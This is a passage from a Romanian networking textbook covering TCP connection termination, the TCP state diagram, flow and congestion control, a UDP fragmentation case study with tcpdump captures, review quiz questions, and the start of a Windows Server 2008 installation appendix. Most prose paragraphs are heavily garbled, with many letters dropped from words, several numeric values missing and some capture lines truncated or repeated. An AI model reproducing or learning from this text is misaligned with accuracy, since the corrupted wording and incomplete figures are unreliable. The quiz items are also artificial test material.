apli aţie. Datele au u e ele de se e ţă up i se î t e şi ; li ita
supe ioa ă este de fapt u ă ul de se e ţă aşteptat a u ă de o fi a e în pachetul de
ăspu s. Al doilea pa het este pa hetul de ăspu s t i is de ăt e lie t se e ului; se o se ă
p eze ţa flag-ului ACK şi folosi ea u ă ului de o fi a e aşteptat, adi ă .
U ătoa ele două pa hete ep ezi tă a elaşi lu u a ai sus: t a s ite ea a de
o teţi şi p i i ea u ui pa het de ăspu s, î să di e ţia este s hi ată.
11.3.3.4 Terminarea unei conexiuni TCP

Pentru terminarea unei conexini TCP sunt necesare patru segmente TCP pentru a închide
complet o conexiune. Acesta este un protocol four-way handshake. Sunt necesare patru
segmente deoarece TCP este un protocol full-duplex, î se â d ă fie a e apăt t e uie î his
independe t. Pe t u î hide ea u ui apăt al o e iu ii se t a s ite u seg e t u flag-ul
FIN a ti at, ia elălalt apăt îi ăspu de u u seg e t de o fi a e flag-ul ACK activat).
D ept u a e, o î hide e o pletă a u ei o e iu i TCP e esită o pe e he de segmente FIN
şi ACK de la fie a e apăt. P oto olul de te i a e este p eze tat ai jos:
11-4: Terminarea unei conexiuni TCP
Câ d u ul di apete lie tul sau se e ul do eşte î hide ea o e iu ii, t a smite un

seg e t a e o ţi e a ti flag-ul FIN ia elălalt apăt îi ăspu de u u seg e t ACK,
u â d a î etapa u ătoa e olu ile să se i e seze.
Mai jos este p eze tat u e e plu de aptu ă a pa hetelo utilizate pe t u î heie ea
unei conexiuni:
IP 127.0.0.1.32929 > 127.0.0.1.1234: F 3127227423:3127227423(0) ack 3134999211 win 32767
<nop,nop,timestamp 21011608 21011608>
21011609 21011608>
390 | ‘ e ţ e l e L o a l e
IP 127.0.0.1.1234 > 127.0.0.1.32929: F 3134999211:3134999211(0) ack 3127227424 win 32767

<nop,nop,timestamp 21011630 21011608>
21011630 21011630>
“e o se ă ă e istă două pe e hi de pa hete de te i a e, aşa u e a de aşteptat.

P i a pe e he ep ezi tă e e ea de î heie e de o e iu e t a s isă de lie t se e ului şi
pa hetul de ăspu s sosit de la se e ; ea de-a doua pe e he ep ezi tă e e ea de o e iu e
t a s isă de ăt e se e lie tului şi ăspu sul a estuia di u a. Pa hetul de î heie e de
o e iu e o ţi e a ti at flag-ul FIN (simbolul F de otă p eze ţa flag-ului FIN). Primul pachet
de încheiere are u ă ul de se e ţă , ia pa hetul de ăspu s a e u ă ul de
confirmare 3127227 + . La fel se î tâ plă şi pe t u ea de-a doua pereche de pachete de
încheiere a conexiunii.
Este posi il să se foloseas ă u p oto ol de te i a e three-way handshake, î a e, după
e u apăt t i ite u seg e t FIN, elălalt apăt îi ăspu de u u segment FIN & ACK, iar
p i ul apăt ăspu de u ACK. A easta este ea ai o iş uită etodă de î heie e a u ei
conexiuni.
De ase e ea, este posi il a ele două apete să t a s ită simultan segmente FIN, după
a e a ele t e uie doa să t a s ită seg e te de confirmare (ACK). Acesta poate fi
considerat un protocol de închidere two-way handshake, deoa e e se e ţa FIN/ACK este
e e utată î pa alel pe t u a ele di e ţii.
La fel a la des hide ea u ei o e iu i, e istă u timeout în care se poate primi segmentul
de o fi a e. Da a a esta u este p i it, se ealizează et a s ite ea seg e tului e
o ţi e a ti at flag-ul FIN. Totodată, după t a s ite ea seg e tului de o fi a e, socketul
trece într-o sta e spe ială tip wait î a e aşteaptă u ti p a e să asigure ajungerea
seg e tului de o fi a e la desti aţie. Da ă î a est ti p p i eşte u ou seg e t FIN
se ă seg e tul de o fi a e nu a aju s la desti aţie , t a s ite u ou seg e t şi
epo eşte timer-ul. Altfel, după e pi a ea timer-ului, conexiu ea se o side ă o plet
î heiată şi o i e esu se aso iate socket-ului sunt eliberate.
O conexiune se poate afla în starea half-ope , î a e u apăt este î his, da elălalt
u. Capătul î his u poate să ai t a s ită date, da poate p i i. “ituaţia este invers pentru
apătul opus al o e iu ii. Co u i aţia este de tip simplex.
I te faţa socket fu izează apli aţiei apelu ile close şi shutdown pentru terminarea unei
conexiuni TCP. În vreme ce apelul close închide complet conexiunea, apelul shutdown poate
e ţi e o e iu ea î sta ea "half-ope . Câteva exemple de utilizare a acestor apeluri sunt
prezentate mai jos:
/* inchiderea conexiunii */
close (sock);
/* inchiderea capatului de scriere; se pot citi date din socket, dar nu scrie */
shutdown (sock, SHUT_WR); /* socket-ul este “half-open” */
/* inchiderea capatului de citire; se pot scrie date in socket, dar nu citi */
shutdown (sock, SHUT_RD); /* socket-ul este “half-open” */
/* inchiderea conexiunii (echivalent close) */
shutdown (sock, SHUT_RDWR);
Resetarea conexiunii
E istă situaţii î a e TCP do eşte eseta ea o e iu ii - de e e plu, da ă se soli ită
i iţie ea u ei o e iu i la u po t i e iste t. Î a est az, ealaltă pa te a t i ite u seg e t
cu bitul RST setat pentru a anula solicita ea. O altă situaţie este atu i â d se o stată ă
elălalt apăt al o e iu ii u ăspu de u a u it ti p timeout).
11.3.3.5 Diagrama de stări

Toate e e i e tele e au lo î ti pul sta ili ii o e iu ii, t a sfe ului şi î hide ii
conexiunii pot fi rezumate printr-un automat finit cunoscut sub numele de diagra ă de stări.
După u suge ează hia u ele, este o aşi ă u u u ă li itat de stă i. O sta e este
păst ată pâ ă î o e tul apa iţiei u ui e e i e t, o e t î a e se poate t e e î altă
sta e şi/sau efe tua o a ţiu e.
A este stă i posi ile su t ele di ta elul de ai jos de u i ile su t ase ă ătoa e u
cele utilizate de netstat).
Stare Descriere
CLOSED Nu e istă o e iu e.
LISTEN “e e ul aşteaptă e e i de la lie ţi.
SYN_SENT Clientul a trimis e e ea de i iţie e a o e iu ii. “e aşteaptă o fi a ea.
SYN_RCVD S-a p i it o e e e de i iţie e o e iu e.
ESTABLISHED S-a stabilit conexiunea.
FIN_WAIT_1 Apli aţia a soli itat î hide ea o e iu ii.
FIN_WAIT_2 Serverul a acceptat închiderea conexiunii.
CLOSING A ele pă ţi soli ită si ulta î hide ea o e iu ii.
TIME_WAIT Conexiune î hisă, da se aşteptă a pa hetele et a s ise să dispa ă.
CLOSE_WAIT “e e ul aşteaptă î hide ea o e iu ii di sp e pa tea apli aţiei.
LAST_ACK Serverul a în his o e iu ea şi aşteaptă ulti a o fi a e.
11-5: “tările diagra ei de stări TCP
Î diag a a ilust ată î figu a de ai jos se pot o se a tipu i de t a ziţii î t e ele

stă i: t a ziţii e o espu d u ei fu ţio ă i o ale pe t u lie t li ii o ale, o ti ue ,
pe t u se e li ii o ale, î t e upte şi t a ziţii pe t u situaţii esta da d li ii su ţi i,
continue).
O o po ta e o ală pe t u lie t p esupu e pa u ge ea u ătoa elo stă i: CLOSED,
SYN_SENT, ESTABLISHED, FIN_WAIT_1, FIN_WAIT_2, TIME_WAIT:
 I iţial lie tul TCP se află î sta ea CLO“ED.
 Aşteptâ d î sta ea CLO“ED lie tul poate p i i de la apli aţie o e e e de i iţie e a ti ă a u ei
o e iu i. T i ite u seg e t “YN şi t e e î starea SYN_SENT.
 Î sta ea “YN_“ENT lie tul aşteaptă de la se e u seg e t ACK+“YN, după a e t i ite u
ACK şi t e e î sta ea E“TABLI“HED. Di a est o e t poate î epe t a sfe ul efe ti de date.
Clie tul a ă â e î a eastă sta e ât ti p a e de trimis/primit date.
 Aflat î a eastă sta e lie tul TCP poate p i i di pa tea apli aţiei o e e e de î hide e a
o e iu ii. Î a est az a t i ite u seg e t FIN şi t e e î sta ea FIN_WAIT_ .
 Î a eastă sta e lie tul aşteaptă ACK di pa tea se e ului. După e-l p i eşte, conexiunea
într-u se s se a î hide şi lie tul t e e î sta ea FIN_WAIT_ .
 “ta ea FIN_WAIT_ du ează pâ ă â d p i eşte e e ea de î hide e a o e iu ii, FIN, di
pa tea se e ului. T i ite ACK şi a t e e î sta ea TIME_WAIT.
 Î a eastă sta e se a po i u timer u aloa ea setată la du lul ti pului de iaţă a i
estimat pentru un segment, MSL (Maximum Segment Lifetime). Acest timer permite
retransmiterea ACK-ului î azul î a e a esta se pie de elălalt apăt a da timeout şi a
retransmite segmentul FIN). În tot acest timp cei doi so keţi de la lie t şi se e u o putea
fi eutilizaţi. Totodată seg e tele î tâ ziate a e soses î a eastă pe ioadă su t ig o ate.
După e pi a ea a estui timer clientul revine în starea i iţială CLO“ED.
392 | ‘ e ţ e l e L o a l e
11-6: Diagra a de stări pe tru TCP
Di pu tul de ede e al u ui se e o o po ta e sta da d pa u ge u ătoa ele stă i:

CLO“ED, LI“TEN, “YN_‘CVD, E“TABLI“HED, CLO“E_WAIT şi LA“T_ACK:
 Iniţial se e ul TCP se află î sta ea CLO“ED.
 Î a eastă sta e poate p i i de la apli aţia se e o e e e de i iţie e pasi ă şi t e e î sta ea
LISTEN.
 Aflat î sta ea LI“TEN se e ul TCP poate e epţio a u seg e t “YN de la u lie t TCP. Î
acest caz va t i ite ACK+“YN şi a t e e î sta ea “YN_‘CVD.
 Î a eastă sta e se e ul aşteaptă p i i ea o fi ă ii de la lie t, o e t î a e o e iu ea
e sta ilită î a ele se su i şi se poate î epe t a sfe ul de date sta ea E“TABLI“HED .
 Clientul TCP poate soli ita î hide ea o e iu ii t i iţâ d u seg e t FIN ăt e se e . Î a est
az se e ul TCP t i ite o fi a ea şi t e e î sta ea CLO“E_WAIT.
 Î a eastă sta e se e ul aşteaptă să p i eas ă di pa tea p og a ului se e î hide ea
conexiunii, moment î a e a t i ite ăt e lie t u seg e t FIN şi t e e î sta ea LA“T_ACK.
 “e e ul aşteaptă p i i ea ulti ei o fi ă i de la lie t după a e e i e î sta ea CLO“ED.
Atât se e ul ât şi lie tul TCP se pot afla î o i a e di ele stă i ale diagramei.
11.3.4 Controlul fluxului

Da ă î ă de la î eputul p oie tă ii p oto olului s-a euşit sta ili ea fo atului u ui
seg e t TCP şi a odului î a e t e uie să se fa ă î hide ea şi des hide ea u ei o e iu i,
u a elaşi lu u se poate spu e şi desp e odul î a e a t e ui să se ealizeze o t olul
flu ului. Faptul ă TCP-ul a ă as es hi at di â d ‘FC-ul 2581 a specificat clar
odul î a e t e uie să se o po te o i ple e ta e de TCP , ă â e u ezultat i po ta t
î do e iul eţelelo de al ulatoare.
Î ele e u ează oţiu ea de control al fluxului se efe ă la totalitatea algo it ilo a e

permit atingerea unei viteze de transfer punct-la-punct cât mai mare pentru toate conexiunile
e iste te. Î p i ipal a eşti algo it i sta iles odul î a e seg e tele şi o fi ă ile
t e uie t i ise şi a ţiu ile a e t e uie e e utate î situaţiile î a e ăspu su ile aşteptate de
la elălalt apăt î tâ zie să soseas ă. O pa te di t e algo it ii ei ai utilizaţi su t p eze taţi
mai jos.
11.3.4.1 Întârzierea co fir ărilor

O odalitate si plă de ge e a e a o fi ă ilo este de a t i ite âte u a pe t u fie a e
seg e t p i it. A eastă politi ă p ezi tă a a tajul de a fa e o u i aţia self-clocking
(folosindu-se easul i te î să este i efi ie tă da ă seg e tele a e u o ţi de ât
o fi ă i su t u ate la s u tă dista ţă âte a ze i de ilise u de de seg e te e o ţi
date efe ti e. Pe t u a e ita a eastă situaţie se p o edează la î tâ zie ea seg e telo a e
o ţi doa o fi ă i aloa ea uzuală fii d de s . A eastă st ategie fa e posi il a u
ăspu s ge e at de p i i ea u o date să ple e sp e elălalt apăt î a elaşi seg e t u
confirmarea.
Deoa e e este difi il să fie e ţi ute timere pe t u fie a e o fi a e, dife e ţa de
s este al ulată de un timer global la nivel de sistem. Din acest motiv, modul efectiv de
o po ta e poate fi des is astfel: â d u seg e t u o ţi e de ât o o fi a e, este
adăugat î t -o oadă e a fi i spe tată de u p o es a e di î s t i ite tot e s-a
a u ulat î oadă.
11.3.4.2 Algoritmul Nagle

Algo it ul p opus de Joh Nagle î ‘FC , î ea ă să î u ătăţeas ă pe fo a ţele
e ploatâ d u ătoa ea a a te isti ă des î tâl ită î dialogul di t e două staţii: da ă se
î ea ă t i ite ea u o date de di e siu e i ă atu i â d e istă î ă date e o fi ate
de pa te e , a estea su t depozitate şi t i ise î t -u seg e t ai a e atu i â d soseşte
o fi a ea aşteptată. Î a est fel se poate e ita ge e a ea datag a elo i i tinygrame), în
situaţia u ei legătu i le te. Î azul u ei legătu i apide o fi ă ile o e i epede şi
î tâ zie ea i t odusă de algo it a eglija ilă.
E istă î să şi azu i î a e a est algo it du e la dep e ie ea pe fo a ţelo : esajele
s u te ge e ate de iş ă ile mouse-ului în cazul folosirii unui server X Windows sau utilizarea
tastelo a e t i it ai ult de u a a te se e ţe escape). Pentru a rezolva aceste
inconveniente, API-ul de utilizare a TCP-ului t e uie să ofe e o odalitate de a deza ti a a est
algoritm (în sistemele azate pe so keţi e istă î a est s op opţiu ea TCP_NODELAY .
11.3.4.3 Fereastra glisa tă

Algoritmul implementat de TCP pentru a implementa transferul sigur de date este
cunoscut în teorie sub numele de Go-Back-N. Î a est algo it se utilizează u e e de
secvenţă pe t u a disti ge pa hetele î t e ele şi o oadă de pa hete di e siu ea a i ă a
ozii o ep ezi tă fe east a a ă o o fi a e se aşteaptă. Pa hetele se î pa t î pat u
categorii:
 pa hete t i ise şi pe t u a e s-a primit confirmare;
 pachete trimise şi pe t u a e se aşteaptă î ă o fi a ea;
 pa hete a e u au fost t i ise î ă da a e u depăşes li itele fe est ei şi de i pot fi t i ise;
 pa hete a e î ă u au fost t i ise şi a e i i u o putea fi t i ise de ât după e au fost
trimise toate pa hetele di atego ia şi s-au p i it o pa te di o fi ă ile pa hetelo di
categoria 2.
394 | ‘ e ţ e l e L o a l e
Î situaţia î a e o fi ă ile pe t u pa hetele di atego ia î tâ zie p ea ult u

mecanism de timere i fo ează asup a a estui lu u atu i ele o fi etransmise. În
e siu ea i iţială TCP-ul nu permitea decât o fir ări poziti e, eea e î sea ă ă
avansarea ferestrei se va opri la segmentele neconfirmate. O modalitate de a evita aceste
situaţii a fi p eze tată î detaliu î se ţiu ile u ătoa e. O soluţie foa te adi ală o o stituie
introducerea de o fir ări sele ti e. A eastă odifi ă fa e a TCP-ul a tual să fie u hi id de
Go-Back-N şi Selective Repeat.
Deoa e e di e siu ea fe est ei este a u ţată la fie a e seg e t, u lie t le t poate a
pe măsu ă e t i ite o fi ă ile să i fo eze desp e p og esul î egist at la li a ea datelo
ăt e i elul apli aţie. Da ă datele i p ea epede pe t u iteza u a e lie tul p o esează
datele, fe east a se a di i ua şi hia î hide a est lu u se ealizează a u ţâ d o fe east ă
de dimensiune zero).
11.3.4.4 Evitarea congestiei

Da ă ei doi pa te e i a e o u i ă p elu ează datele sufi ie t de epede şi o să
t a sfe e u olu a e de date, atu i li ita ea de a e se o lo i este ea dată de iteza
eţelei. Di auza odului de fu ţio a e best-effort pe a e îl ofe ă IP, atu i â d a alul de
o u i aţie este satu at, o pa te di seg e tele TCP se pie d. Î od pa ado al atât
t a s iţăto ul ât şi e epto ul se pot afla î poziţia de a fi p i ii î dete tarea pierderii unui
seg e t. U ul di i di iile date de t a s iţăto desp e pie de ea u ui seg e t este, î od
e ide t, apa iţia u ui timeout a timer-ului de retransmisie. La nivelul receptorului un indiciu al
posibilei pierderi a unui segment este primirea unor segmente cu date neordonate (out-of-
order . Deoa e e TCP î a ia ta i iţială u pe ite de ât o fi ă i poziti e, si gu ul lu u pe
care receptorul îl poate face este ca la fiecare segment out-of-order p i it să t i ită o
confirmare indicând prin a easta ă la el o ti uă să i ă seg e te î să el i di at de u ă ul
de se e ţă de o fi a e lipseşte.
P i i ea a esto o fi ă i ultiple este al doilea od î a e t a s iţăto ul poate afla
de apa iţia o gestiei.
Algoritmul ce trebuie aplicat în mo e tul î a e se dete tează apa iţia o gestiei este
u os ut su u ele de „e ita ea o gestiei congestion avoidance . P i ipiul a e stă la
aza a estuia este a la apa iţia o gestiei fie să se t ea ă la o i e e ta e li ia ă a
dimensiunii ferestrei, î azul î a e o gestia a fost dete tată a u a e a p i i ii u o
o fi ă i ide ti e epetate, fie să se eia algo it ul slow start-ului în cazul în care congestia
s-a detectat prin expirarea unui timer. I ple e ta ea a estui algo it se azează pe utilizarea
unui nou contor (sstresh a e să i di e di e siu ea fe est ei de la a e se t e e de la
i e e ta ea e po e ţială la ea li ia ă. Algo it ul efe ti este u ăto ul:
1. la sta ili ea u ei oi o e iu i se plea ă u sstresh i iţializat la aloa ea de K şi cwnd la
dimensiunea unui segment.
2. trimiterea de seg e te se fa e fă ă a depăşi i i ul di t e fe east a pu li ată de pa te e
pe t u a u depăşi apa itatea de p o esa e a pa te e ului şi cwnd curent (pentru a nu
depăşi li ita i pusă de apa itatea eţelei .
3. la apa iţia congestiei sstresh este o figu at la ju ătatea alo ii fe est ei u e te i i ul
di t e fe east a a u ţată de pa te e şi cwnd î să el puţi di e siu ea o espu zătoa e
pe t u două seg e te ; î azul î a e o gestia a fost dete tată p i e pi a ea u ui timer,
cwnd este i iţializat u di e siu ea u ui seg e t.
4. la primirea unei o fi ă i i e e ta ea se fa e î două odu i, î fu ţie de elaţia î a e
se află cwnd şi sstresh:
o când cwnd stee mai mic sau egal cu sstresh se fa e i e e ta ea e po e ţială a a te isti ă slow
start-ului (care de fapt nu este deloc slow, î azul de faţă .
o când cwnd este mai mare ca sstresh atunci se face o incrementare cu dimensiunea unui segment.
11.3.4.5 TCP Keepalive Timer

O a a te isti ă i po ta tă a TCP este faptul ă, da ă i elu ile supe ioa e u o u i ă
î t e ele pe t u o pe ioadă, niciun segment nu se va transfera. Aspectul este natural, de
vreme ce TCP este de fapt un contract cu care cei doi parteneri au fost de acord din momentul
în ca e au t e ut u su es de faza sta ili ii legătu ii. Da ă i elu ile i fe ioa e eţea/IP, fizi
de i te po a i dispo i ile ât ti p ei doi u o să o u i e, u se a pe tu a î niciun
fel a ti itatea şi a est lu u este a epta il.
Probleme încep să apa ă î o e tul î a e ei doi do es să o u i e şi i elu ile
i fe ioa e u ai pe it a est lu u. Cel a e a do i să o u i e a dete ta î t e upe ea
legătu ii şi a î hide o e iu ea. Totuşi, elălalt apăt u este a u ţat de î heie ea
conexiu ii. Legătu a a fi î o ti ua e a ti ă şi, î ge e al, a u ite esu se o fi eze ate
pentru aceasta.
‘ezol a ea a estei situaţii este dată de i t odu e ea u ei e a is de so da e a stă ii
legătu ii pe aza u ui timer (TCP Keepalive Timer) care se de la şează di două î două o e. La
fiecare expirare a timer-ului se t i ite u seg e t fă ă date a e o fi ă datele p i ite pâ ă
atu i. ‘ăspu sul a e t e uie p i it este tot u seg e t fă ă date a e o fi ă datele
primite de partener (practic o republi a e a stă ii elo doi pa te e i . Da ă ăspu sul u este
p i it ti p de se u de atu i seg e tul a fi et a s is. Da ă după astfel de î e ă i
nu s-a primit niciun ăspu s, o e iu ea se a o side a te i ată şi se a a u ţa i elul
superior asupra acestui lucru.
O se aţii:
 da ă o staţie p i eşte seg e te de keepalive despre conexiuni care nu mai sunt active (de
e e plu au fost esetate atu i a ăspu de u seg e te de eset a esta e u p o edeu
standard);
 ‘FC spe ifi ă faptul ă facilitatea de keepalive t e uie a ti ată î od e pli it.
11.4 Studiu de caz: Fragmentarea pachetelor UDP

Î t u ât UDP este u se i iu fă ă o e iu e, toate datele pe a e le p i eşte de la i elul
superior sunt încapsulate într-o si gu ă datag a ă UDP a e apoi fo ează u pa het IP. Da ă
pa hetul IP astfel o ţi ut este p ea a e, atu i e a is ele IP de f ag e ta e îl o spa ge
î u ăţi. E e plul u ăto p ezi tă a est fe o e .
Pe sistemul athos ulează u se e de UDP pe po tul . Pe u alt siste , frodo, aflat
î eţeaua lo ală este ulat u lie t a e poate fi o figu at să t i ită u pa het UDP de o
a u ită lu gi e. Pe t u a putea o se a e se î tâ plă pe athos este rulat tcpdump.
Deoa e e MTU pe t u o eţea Ethe et este î ge e al şi a tetul IP plus cel UDP
o upă + = o teţi, o datag a ă UDP de di e siu e a t e ui sa fie t i isă
ef ag e tată. Pe t u sigu a ţă, folosi d lie tul de pe athos, s-a trimis mai întâi o
datag a ă UDP u o teţi de date, şi apoi î ă u a u . Pentru ambele tcpdump a
i di at t i ite ea lo fă ă f ag e ta e
18:25:56.721144 frodo.noi.33274 > athos.noi.50007: udp 1471 (DF) (ttl 64, id 51481, len 1499)
18:25:59.846764 frodo.noi.33274 > athos.noi.50007: udp 1472 (DF) (ttl 64, id 51793, len 1500)
La o di e siu e de a t e ui a t i ite ea să ge e eze două pa hete IP: u ul a e să

o ţi ă p i ii a tetul UDP plus p i ii o teţi de date şi î ă u pa het IP a e o ţi e u
si gu o tet. Iată e i di ă tcpdump-ul:
18:26:05.705813 frodo.noi > athos.noi: udp (frag 36274:1@1480) (ttl 64, len 21)
18:26:05.706116 frodo.noi.33274 > athos.noi.50007: udp 1473 (frag 36274:1480@0+) (ttl
64, len 1500)
“e poate o se a ă au fost ge e ate două pa hete IP:

396 | ‘ e ţ e l e L o a l e
 p i ul o ţi e doa u si gu o tet de date şi ep ezi tă ulti ul f ag e t itul more

fragments este dezactivat) dintr-o datag a ă UDP di a tetul IP se poate dete i a a est
lu u a e a fost spa tă î u ăţi; deplasa e tul o tetului p i it î datag a a o igi ală este
1480;
 al doilea pachet este primul frag e t di datag a a UDP şi o ţi e a tetul UDP di auza
asta datele efe ti e o upă doa o teţi ; deplasa e tul este şi itul de more
fragments este a ti at a est lu u este i di at de se ul „+ de după deplasa e t
A ele pa hete poa tă a elaşi u ă de ide tifi a e . A est lu u, î p eu ă u
i fo aţiile date de flag-ul more fragments, pe ite e o st u ţia la desti aţie a datag a ei
UDP o igi ale. O p o le ă a a estui od de f ag e ta e este ă î azul pie de ii u ui
fragment întreaga datag a ă a fi o p o isă şi a t e ui et i isă î î t egi e.
Ce se a î tâ pla da ă se a î e a t i ite ea u ei datag a e UDP sufi ie t de a e
pe t u a e esita spa ge ea î t ei u ăţi? Mai jos este ep eze tat u t a sfe de de
o teţi:
13:21:08.251795 frodo.noi > athos.noi: udp (frag 23522:1480@1480+) (ttl 64, len 1500)
64, len 1500)
T i ite ea î o di e i e să este o a a te isti ă a siste ului de test. O datag a ă de

di e siu e şi ai a e o fi ă a est lu u:
64, len 1500)
Î tre ări
1. Da ă la u o e t dat a fost e epţio at u pa het u u ă ul de se e ţă ,
e u ă de se e ţă a a ea pa hetul de o fi a e?
 1024
 1023
 1025
 1026
2. Suma de control a UDP-ului a ope ă:

 Doar datele.
 Doar antetul.
 Datele şi pseudo-antetul.
 Întregul pachet UDP plus un pseudo-antet
 Niciuna din variante.
3. Ca e di u ătoa ele ep ezi tă utiliză i tipi e pe t u UDP: sele taţi ai ulte :

 Spanning Tree Protocol.
 Remote Procedure Call.
 T a sfe ul sigu de esaje s u te âte a sute de o teţi .
 Video o fe i ţe.
4. Ca e di u ătoa ele a a te isti i apa ţi TCP-ului (selectaţi :

 Ga a tează aju ge ea datelo la desti aţie.
 Overhead-ul este de aproximativ 8 de octeti.
 Este orientat conexiune.
 Este un serviciu de tip mesaj.
5. Câ d este t i isă di e siu ea fe est ei?

 O si gu ă dată, la i iţie ea o e iu ii.
 O si gu ă dată, la te i a ea o e iu ii.
 În fiecare pachet TCP.
6. Ori de câte o i se do eşte odifi a ea di e iu ii fe est ei.

 Care este a a tajul ofe it de UDP faţă de IP?
 Niciun avantaj, a fost introdus pentru compatibilitate.
 Permite multiplexarea porturilor.
 Antetul UDP este mai mic decât cel IP.
 Î u ătăţi ea su sta ţială a sigu a ţei datelo .
7. Care este comportamentul unui client aflat în starea FIN_WAIT2?

 A t i is ăt e se e u pa het de FIN, soli itâ d î hide ea o e iu ii.
 A primit de la server confirmarea cererii de închidere a conexiunii.
 A p i it de la se e o e e e de î hide e a o e iu ii şi a t i is o fi a ea.
 U lie t u se poate afla î a eastă sta e i doa u se e .
398 | ‘ e ţ e l e L o a l e
8. Ce se î tâ plă da ă o e iu ea fizi ă î t e se e şi lie t a fost temporar

o p o isă î t -u o e t î a e se e ul şi lie tul u t a sfe au date î t e ei?
 Co e iu ea TCP este o p o isă şi se a t e ui i iţiată u a ouă.
 Co e iu ea TCP este e ţi ută deoa e e ele două aşi i u au t a sfe at date.
 Conexiu ea TCP se pie de, da u dato ită pie de ii te po a e a o e ti ităţii fizi e, i
dato ită ti eout-ului.
 Co e iu ea TCP este p a ti e ţi ută deoa e e este efă ută auto at de i ele
inferioare.
9. P esupu â d a u e istă p o le e la o u i aţia î t e u lie t şi u se e TCP,

e iţi o fi a ti i î ad ul esajului de ăspu s al se e ului după e lie tul a
e is u esaj de i iţie e de o e iu e “YN ?
 SYN, FIN
 ACK, FIN
 SYN, ACK
 ACK
10. Ca e este o po ta e tul u ui lie t TCP a e do eşte î heie ea o u i aţiei u

un server TCP?
 î hide o e iu ea şi t e e î sta ea CLO“ED
 t a s ite u esaj u â pul de o t ol FIN setat şi t e e î sta ea CLO“ED
 t a s ite u esaj u itul FIN a ti şi t e e î sta ea FIN_WAIT , u de aşteaptă u
mesaj cu bitul ACK activ de la server
 t a s ite u esaj u itul FIN a ti şi t e e î sta ea FIN_WAIT , u de aşteaptă u
esaj u iţii FIN şi ACK a ti i de la se e
12 Anexe
12.1 Anexa 1: Instalare Windows Server 2008
12.1.1 Versiuni
Microsoft Windows Server 2008 a ieşit pe piaţă î ai ulte a ia te, o ie tate sp e a
a ope i o ga ă ât ai la gă de utilizato i, i f ast u tu i şi teh ologii. Î ele e u ează, vor
fi prezentate variantele sub care Windows Server 2008 este disponibil la momentul scrierii
a estei ă ţi:
 Windows Server 2008 Web Edition: Co eput a o si plă platfo ă II“ Internet Information
Services apa ilă de a găzdui pagi i şi apli aţii e , ofe i d supo t pe t u se i ii XML1
(eXtensible Markup Language), inclusiv ASP2 (Active Server Pages şi platfo a .NET3.
 Windows Server 2008 Standard Edition: Conceput pentru mediul SMB-uri (Small and Medium
Business ; supo tă pa taja ea fişie elo şi a i p i a telo î eţea şi poate lu a u pâ ă la
p o esoa e şi GB ‘AM.
 Windows Server 2008 Datacenter Edition: Con eput pe t u i f ast u tu i u e i ţe a i de
se u itate şi edu da ţă şi pe t u siste e u pute e a e de p o esa e. “upo tă pâ ă la de
p o esoa e şi TB ‘AM î a ia ta pe de iţi.
 Windows Server 2008 Enterprise Edition: Adresat mediului medium to large business. “upo tă
pâ ă la p o esoa e şi GB ‘AM pe de iţi şi ofe ă se i ii a a sate de clustering4 şi
5
virtualizare .
 Windows Storage Server 2008: Co eput a o platfo ă spe ializată pe t u ad i ist a ea NA“
(Network Attached Storage şi opti izat pe t u se i iile de pa taja e de fişie e şi i p i a te
în medii SAN (Storage Area Network)6.
 Windows Server 2008 for Itanium-Based Systems: P o esoa ele I tel Ita iu pe de iţi
e esită a eastă e siu e pa ti ula ă de Windows Server 2008 pe sistemele pe care sunt
instalate.
 Windows HPC Server 2008: Optimizat pentru sisteme HPC (High Performance Computing).
Poate s ala pâ ă la âte a ii de odu i de p o esa e şi ofe ă etode a a sate de
monitorizare a sistemelor. De asemenea, este specializat î p og a a ea şi dist i ui ea jo -
u ilo de p o esa e, putâ d o u i a deopot i ă u platfo e HPC azate pe Li u .
 Windows Server 2008 Standard Without Hyper-V
 Windows Server 2008 Enterprise Without Hyper-V
 Windows Server 2008 Datacenter Without Hyper-V
Hyper-V7 ep ezi tă u siste de i tualiza e azat pe u h pe iso , pe t u siste e .
Va ia ta fi ală a lui H pe -V a fost i t odusă î dist i uţiile de Windows Server 2008 la
sfâ şitul lui iu ie . Î ai te de la sa e a pu tat u ele de od Vi idia şi a i ulat şi su
denumirea de Windows Server Virtualization.
Un hypervisor este o o po e tă a u ei platfo e de i tualiza e, de u it şi Vi tual
Machine Monitor care permite rularea mai multor sisteme de operare pe acelasi calculator,
simultan.
1
http://www.w3.org/XML/
2
http://www.asp.net/
3
http://www.microsoft.com/NET/
4
http://en.wikipedia.org/wiki/Computer_cluster
5
http://en.wikipedia.org/wiki/Virtualization
6
http://en.wikipedia.org/wiki/Storage_area_network
7
http://www.microsoft.com/windowsserver2008/en/us/hyperv.aspx
400 | ‘ e ţ e l e L o a l e
Pent u e ţi e ea o pati ilităţii hardware, versiunile de Windows Server 2008 sunt

dispo i ile atât î e siu i pe de iţi ât şi pe de iţi.
Ve siu ea folosită la s ie ea a estei ă ţi şi pe a e se a e e plifi a i stala ea şi
configurarea de servicii este Windows Server 2008 Standard Edition, a ia ta pe de iţi.
Î o e tul de faţă, p i i te ediul M“DNAA Microsoft Developers Network Academic
Alliance su t dispo i ile î şi de iţi a ia tele “ta da d şi E te p ise.
12.1.2 Considerente generale

Unul dintre avantajele majore pe care instalarea de Windows Server 2008 îl ofe ă faţă de
versiunile precedente din seria Server este faptul ă i stala ea e esită o i te a ţiu e
i i ală di pa tea ad i ist ato ului pe pa u sul ei. Ceea e Mi osoft a numit unattended
installation ep ezi tă posi ilitatea de a o figu a toţi pa a et ii de i stala e de la î eput,
u â d a i stala ea să se e e ute pâ ă la pu tul de po i e a se e ului fă ă a ai e esita
date suplimentare cum ar fi configurarea numelui sistemului, a unui domeniu, a conexiunilor
de eţea, a zo ei, et . A est tip de i stala e se î tâl eşte şi î azul lui Vista.
Windows Server 2008 ofe ă două tipu i ge e ale de i stala e: o i stala e o pletă sau o
a ia tă edusă a elei o plete, a e u ofe ă GUI Graphical User Interface) ci doar accesul
prin intermediul unui terminal, din care lipsesc anumite servicii ce nu sunt necesare
fu ţio ă ii se e ului şi o ţi e doa a ele fa ilităţi i po ta te pe t u olu ile pe a e le a
deservi instala ea espe ti ă, sp e e e plu Active Directory sau Domain Name System (DNS).
Acest tip de instalare, denumit Server Core, a fost conceput pentru a necesita un overhead
i i al pe t u fu ţio a e şi este des î tâl it î a hite tu i de tip cluster1.
Ca practi ă ge e ală, este e o a da il a î ai te de i stala ea o i ă ui siste de ope a e
de tip se e să se ealizeze o ha tă a eţelei î a e a estea o fu ţio a, ţi â d o t de:
 tipurile de servicii pe care acestea le vor oferi
 topologia eţelei
